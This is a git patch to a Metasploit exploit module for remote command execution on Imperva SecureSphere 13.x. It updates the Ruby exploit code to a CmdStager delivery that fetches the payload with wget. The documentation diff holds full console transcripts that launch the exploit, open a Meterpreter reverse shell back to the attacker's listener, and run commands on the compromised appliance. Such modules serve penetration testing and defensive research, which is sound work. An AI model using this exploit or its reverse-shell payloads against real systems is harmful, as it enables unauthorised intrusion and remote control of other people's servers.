From 24de5d6ee36084686cc04b9012a7c8d148d492d2 Mon Sep 17 00:00:00 2001 From: rsp3ar Date: Tue, 8 Jan 2019 20:07:35 -0800 Subject: [PATCH] Update to use CmdStager --- .../linux/http/imperva_securesphere_exec.md | 148 +++++++++++++++--- .../linux/http/imperva_securesphere_exec.rb | 26 ++- 2 files changed, 134 insertions(+), 40 deletions(-) diff --git a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md index 5272d9e43f..604d84315f 100644 --- a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md +++ b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md @@ -13,7 +13,7 @@ Imperva SecureSphere 13.0/13.1/13.2 3. `set PASS [Agent registration password]` if the target has been set to gateway mode 4. Run `check` 5. Verify that the result is `The target is vulnerable.` -6. `set payload cmd/unix/reverse_python` +6. `set payload linux/x64/meterpreter/reverse_tcp` 7. `set LHOST [IP]` 8. Run `exploit` 9. Verify that the reverse shell is obtained @@ -23,21 +23,66 @@ Imperva SecureSphere 13.0/13.1/13.2 Imperva Secure 13.0 Pre-FTL mode: ``` msf5 > use exploit/linux/http/imperva_securesphere_exec -msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.201 -RHOSTS => 192.168.146.201 +msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +RHOST => 192.168.146.201 msf5 exploit(linux/http/imperva_securesphere_exec) > check [+] 192.168.146.201:443 The target is vulnerable. -msf5 exploit(linux/http/imperva_securesphere_exec) > set payload cmd/unix/reverse_python -payload => cmd/unix/reverse_python +msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 LHOST => 192.168.146.215 +msf5 exploit(linux/http/imperva_securesphere_exec) > show options + +Module options (exploit/linux/http/imperva_securesphere_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASS no Agent registration password + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.168.146.201 yes The target address range or CIDR identifier + RPORT 443 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL true no Use SSL + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI /pws/impcli no The URI path to impcli + TIMEOUT 3 no HTTP connection timeout + URIPATH no The URI to use for this exploit (default is random) + USER imperva no Agent registration username + VHOST no HTTP server virtual host + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.146.215 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Imperva SecureSphere 13.0/13.1/13.2 + + msf5 exploit(linux/http/imperva_securesphere_exec) > exploit [*] Started reverse TCP handler on 192.168.146.215:4444 -[*] Sending payload cmd/unix/reverse_python +[*] Sending payload linux/x64/meterpreter/reverse_tcp +[*] Sending stage (816260 bytes) to 192.168.146.201 +[*] Command Stager progress - 100.00% done (1321/1321 bytes) -uname -a -Linux localhost 2.6.32-279.el6.imp8.numa.x86_64 #1 SMP Sun Nov 5 16:18:35 IST 2017 x86_64 x86_64 x86_64 GNU/Linux +meterpreter > sysinfo +Computer : localhost.localdomain +OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > shell +Process 4965 created. +Channel 1 created. id uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd) /sbin/ifconfig @@ -45,10 +90,10 @@ eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99 inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:855 errors:0 dropped:0 overruns:0 frame:0 - TX packets:566 errors:0 dropped:0 overruns:0 carrier:0 + RX packets:1331 errors:0 dropped:0 overruns:0 frame:0 + TX packets:825 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 - RX bytes:94180 (91.9 KiB) TX bytes:198152 (193.5 KiB) + RX bytes:1790319 (1.7 MiB) TX bytes:83116 (81.1 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 @@ -59,28 +104,78 @@ lo Link encap:Local Loopback collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) +exit +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit ``` Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential): ``` msf5 > use exploit/linux/http/imperva_securesphere_exec -msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.201 -RHOSTS => 192.168.146.201 +msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +RHOST => 192.168.146.201 msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS PASS => lshy5782%lsLS msf5 exploit(linux/http/imperva_securesphere_exec) > check [+] 192.168.146.201:443 The target is vulnerable. -msf5 exploit(linux/http/imperva_securesphere_exec) > set payload cmd/unix/reverse_python -payload => cmd/unix/reverse_python +msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 LHOST => 192.168.146.215 +msf5 exploit(linux/http/imperva_securesphere_exec) > show options + +Module options (exploit/linux/http/imperva_securesphere_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASS lshy5782%lsLS no Agent registration password + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.168.146.201 yes The target address range or CIDR identifier + RPORT 443 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL true no Use SSL + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI /pws/impcli no The URI path to impcli + TIMEOUT 3 no HTTP connection timeout + URIPATH no The URI to use for this exploit (default is random) + USER imperva no Agent registration username + VHOST no HTTP server virtual host + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.146.215 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Imperva SecureSphere 13.0/13.1/13.2 + + msf5 exploit(linux/http/imperva_securesphere_exec) > exploit [*] Started reverse TCP handler on 192.168.146.215:4444 -[*] Sending payload cmd/unix/reverse_python +[*] Sending payload linux/x64/meterpreter/reverse_tcp +[*] Sending stage (816260 bytes) to 192.168.146.201 +[*] Command Stager progress - 100.00% done (1321/1321 bytes) -uname -a -Linux GW 2.6.32-279.el6.imp8.numa.x86_64 #1 SMP Sun Nov 5 16:18:35 IST 2017 x86_64 x86_64 x86_64 GNU/Linux +meterpreter > sysinfo +Computer : 192.168.146.201 +OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > shell +Process 19634 created. +Channel 1 created. id uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd) /sbin/ifconfig @@ -88,18 +183,23 @@ eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99 inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:309 errors:0 dropped:0 overruns:0 frame:0 - TX packets:339 errors:0 dropped:0 overruns:0 carrier:0 + RX packets:651 errors:0 dropped:0 overruns:0 frame:0 + TX packets:451 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 - RX bytes:52168 (50.9 KiB) TX bytes:56159 (54.8 KiB) + RX bytes:894174 (873.2 KiB) TX bytes:37181 (36.3 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 - RX packets:787 errors:0 dropped:0 overruns:0 frame:0 - TX packets:787 errors:0 dropped:0 overruns:0 carrier:0 + RX packets:153 errors:0 dropped:0 overruns:0 frame:0 + TX packets:153 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 - RX bytes:111598 (108.9 KiB) TX bytes:111598 (108.9 KiB) + RX bytes:21579 (21.0 KiB) TX bytes:21579 (21.0 KiB) +exit +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit ``` diff --git a/modules/exploits/linux/http/imperva_securesphere_exec.rb b/modules/exploits/linux/http/imperva_securesphere_exec.rb index a2fe030cc2..ea3e91f388 100644 --- a/modules/exploits/linux/http/imperva_securesphere_exec.rb +++ b/modules/exploits/linux/http/imperva_securesphere_exec.rb @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager def initialize(info = {}) super( @@ -33,22 +34,15 @@ class MetasploitModule < Msf::Exploit::Remote [ [ 'EDB', '45542' ] ], - 'Arch' => ARCH_CMD, - 'Payload' => - { - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic python perl ruby openssl netcat' - } - }, - 'Platform' => %w{ linux unix }, - 'Targets' => + 'DisclosureDate' => "Oct 8 2018", + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'CmdStagerFlavor' => %w{ echo printf wget }, + 'Targets' => [ ['Imperva SecureSphere 13.0/13.1/13.2', {}] ], - 'DisclosureDate' => "Oct 8 2018", - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0)) register_options( [ @@ -86,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi(req_params, datastore['TIMEOUT']) end - def execute_command_via_http(cmd) + def execute_command(cmd, opts = {}) data = { 'command' => 'impctl server status', 'parameters' => { @@ -108,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote def check begin - res = execute_command_via_http('id') + res = execute_command('id') rescue => e print_error("#{e}") return CheckCode::Unknown @@ -130,6 +124,6 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Sending payload #{datastore['PAYLOAD']}") - res = execute_command_via_http(payload.encoded) + execute_cmdstager end end